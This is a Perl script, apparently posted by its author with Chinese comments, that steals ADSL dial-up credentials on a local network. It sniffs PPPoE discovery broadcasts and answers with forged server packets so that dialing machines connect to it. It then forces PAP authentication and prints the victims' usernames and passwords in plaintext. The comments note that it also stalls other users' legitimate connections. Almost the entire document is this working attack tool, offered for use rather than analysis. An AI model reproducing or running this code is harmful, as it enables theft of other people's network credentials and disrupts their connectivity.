###写了太长时间,别在自己硬盘里烂掉了。扔出来吧。
###作用:在局域网环境里,取得局域网里进行Adsl拨号的帐号与密码
###原理:Adsl拨号之前要先进行一个广播,收到这个广播包后,伪造一个adsl服务器发送回应
### 如果拨号的PC首先收到伪造包,就会将帐号与密码发送给本程序所在机器。将帐号密码解析出来。
###问题:会导致其他PC的正常拨号长时间等待。解决方法可以调整下面的程序,快速返回一个错误给拨号PC。
####################################
####################################
#!/usr/bin/perl
use Net::Pcap;
### By Alexe
### http://alexe.cublog.cn
my $s_mac;
my $h_uniq;
my $ori_first='001422A6D7A600308801263A88631107000000240103000824000000CC000000010200106A6E2D6A696566616E677169616F2D310101000000000000';
my $ori_sec='001422A6D7A600308801263A8863116532D90024010100000103000823000000CB000000010200106A6E2D6A696566616E677169616F2D3100000000';
my $ori_third='001422A6D7A600308801263A8864110032D90014C02101280012010405D40304C023050623D48B1F0000000000000000000000000000000000000000';
my $ori_4='001422A6D7A600308801263A8864110032D90009C021040000070D030600000000000000000000000000000000000000000000000000000000000000';##这是一个拒绝包,暂时不用了
my $ori_5='001422A6D7A600308801263A8864110032D90010C0210201000E010405BA050622E43925000000000000000000000000000000000000000000000000';
@devs = Net::Pcap::findalldevs(\%devinfo, \$err);
for my $d (@devs) {
# print "$d : $devinfo{$dev}\n";
if ($devinfo{$d}=~/Controller/) {
$dev=$d;
last;
}
}
#$my_mac='001422A6D7A6';
my $my_mac='000C297FB2BA'; ### 一定要改成自己的机器MAC地址
my $first_request=0;
my $pcap = Net::Pcap::open_live($dev, 1024, 1, 0, \$err);
# loop over next 10 packets
Net::Pcap::loop($pcap, -1, \&process_packet, '');
# close the device
Net::Pcap::close($pcap);
sub process_packet {
my($user_data, $header, $packet) = @_;
# do something ...
#print "head:\n";
#foreach $k (keys %$header) {
# print $k,":\t",$header->{$k},"\n";
#}
#print "+++++++++++++\npacket:\n";
my $dat=unpack('H*',$packet);
if (substr($dat,0,12) eq 'ffffffffffff' && substr($dat,24,4) eq '8863' && substr($dat,30,2) eq '09') {##广播信号回复
print "pppoe find dial dev\n";
test_mac($s_mac);
#print substr($dat,48,24),"\n";
$s_mac=substr($dat,12,12);
$h_uniq=substr($dat,48,24);
substr($ori_first,0,12,$s_mac);
substr($ori_first,12,12,$my_mac);
substr($ori_first,40,24,$h_uniq);
my $packet=pack('H*',$ori_first);
Net::Pcap::sendpacket($pcap, $packet);
return;
}
elsif ( substr($dat,24,4) eq '8863' && substr($dat,30,2) eq '19') {##第一次请求回复
$h_uniq=substr($dat,48,24);
substr($ori_sec,0,12,$s_mac);
substr($ori_sec,12,12,$my_mac);
substr($ori_sec,48,24,$h_uniq);
my $packet=pack('H*',$ori_sec);
Net::Pcap::sendpacket($pcap, $packet);
return;
}
elsif (substr($dat,24,4) eq '8864' && substr($dat,30,2) eq '00'&& substr($dat,40,4) eq 'c021') {##开始session
if (substr($dat,44,2) eq '01' && $first_request eq '0') {##第一次configure-request 设置Max receive unit
$f_id=substr($dat,46,2);
$magic_n=substr($dat,64,8);
$mru=substr($dat,56,4);
substr($ori_third,0,12,$s_mac);
substr($ori_third,12,12,$my_mac);
#substr($ori_third,72,8,$magic_n);
my $packet=pack('H*',$ori_third);
Net::Pcap::sendpacket($pcap, $packet); ##发送密码传输方式给客户端,用的是pap.
substr($ori_4,0,12,$s_mac);
substr($ori_4,12,12,$my_mac);
substr($ori_5,46,2,$f_id);
#substr($ori_5,56,4,$mru);
#substr($ori_5,64,8,$magic_n);
my $packet=pack('H*',$ori_4);
Net::Pcap::sendpacket($pcap, $packet);##拒绝对方的Max receive unit请求
$first_request=1;
}
elsif (substr($dat,44,2) eq '01' && $first_request eq '1') {##另一次configure-request,
if (substr($dat,52,2) eq '01') {##设置Max receive unit
my $magic_n=substr($dat,64,8);
$mru=substr($dat,56,4);
$id=substr($dat,46,2);
substr($ori_5,0,12,$s_mac);
substr($ori_5,12,12,$my_mac);
substr($ori_5,46,2,$id);
substr($ori_5,56,4,$mru);
substr($ori_5,64,8,$magic_n);
my $packet=pack('H*',$ori_5);
Net::Pcap::sendpacket($pcap, $packet);##第二次接受Max receive unit请求
}
}
}
elsif (substr($dat,24,4) eq '8864' && substr($dat,30,2) eq '00'&& substr($dat,40,4) eq 'c023' && substr($dat,44,2) eq '01') {##密码发送
my $need=substr($dat,52,-1);
print "username and password:\n";
$first_request=0;
print pack("H*",$need),"\n";
}
}
sub test_mac{
my($come_mac)=@_;
foreach $k (keys %mac_data) {
foreach (@$mac_data{$k}) {
if ($come_mac eq $_) {
if ($k eq 'have_account') {
return (1);##这个mac地址已经有帐号
}
if ($k eq 'have_dialed') {
return(-1);##正在使用这个帐号拨号
}
if ($k eq 'now_broadcast') {
return(2);
}
}
}
}
return(0);##新的mac地址,不在数据中
}
